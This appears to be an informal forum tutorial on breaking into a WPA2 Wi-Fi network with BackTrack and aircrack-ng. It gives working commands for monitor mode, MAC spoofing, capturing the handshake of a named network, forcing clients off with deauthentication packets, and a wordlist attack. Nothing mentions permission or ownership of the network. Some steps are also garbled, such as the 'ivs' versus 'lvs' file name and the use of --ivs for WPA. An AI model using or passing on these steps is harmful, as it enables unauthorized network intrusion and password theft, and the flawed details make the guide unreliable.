ok guys im gonna clear up this tutorial as much as i can,so all people can understand.
requirements:
1.wireless card capable of packet injection
2.Backtrack(5 or 5r3) burned to a usb or cd.
OK,so when backtrack boots up,follow these steps:
1.Enter terminal program
Type: airmon-ng (the list of wireless cards will popup)
wlan0 or wlan1 (depending on the name of your wireless card)
airmon-ng start wlan0(this will put the wireless card in monitor mode)
2.so now if you type airmon-ng you will see (wlan0 and mon0).
3.Now we have to change the MAC address.
Type: ifconfig mon0 down (turns it down)
macchanger -m 00:11:22:33:44:55 mon0(changes the MAC number)
ifconfig mon0 up(turns it on)
4.Now to scan available networks.
Type: airodump-ng mon0
let it scan for about 20>30sec,so after we scanned we got 1 available network
BSSID PWR Beacons #Data #/s CH MB EMC CIPHER AUTH ESSID
02:2A:0A:BE:55:B9 -34 -48 2 0 1 54 WPA2 TKIP PSK jimmy
5.Now we have to collect data about the network.
Type: airodump-ng -c 1 -w wpacracker --bssid 02:2A:0A:BE:55:B9 --ivs mon0
-c is the channel number(CH)/-w is the name of the data file(call it whatever you want)/--bssid is BSSID/--ivs(the certain way to crack wpa)
6.Now if there were any clients using the router,stations must appear
if not then the process wont work and you have to wait until some people start using it..
6.Now open up another terminal.
Type: aireplay-ng -0 1 -e jimmy mon0
wait about 10 sec
so if you look to the other terminal you will see WPA-handshake 02:2A:0A:BE:55:B9
7.Now if we type:dir
you will see that the file was created wpacracker.ivs that contains all the data for the network
8.Now to crack the network after we have collected all data.
Type: aircrack-ng -w /root/Desktop/darkc0de.lst wpacracker.lvs
-w: is the path to the wordlist,you can use any wordlist you want,but BT has one inside it.
9.OK were done,now you just have to wait to see if it catches the password..maybe it is in the list,maybe not.
